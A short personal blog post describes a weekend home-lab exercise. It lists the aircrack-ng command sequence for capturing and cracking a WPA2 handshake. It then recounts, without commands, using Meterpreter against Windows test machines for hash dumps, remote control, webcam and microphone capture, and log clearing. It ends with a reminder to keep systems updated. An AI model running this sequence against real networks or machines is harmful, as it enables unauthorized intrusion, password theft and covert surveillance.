So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab. – so here’s the thing:
It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:
airmon–ng
airmon–ng start
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security. I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. 
Oh…. and I cleared the logs as I left the scene – all within a couple of hours.
So keep those systems secure and up to date peeps!
MystaJoneS 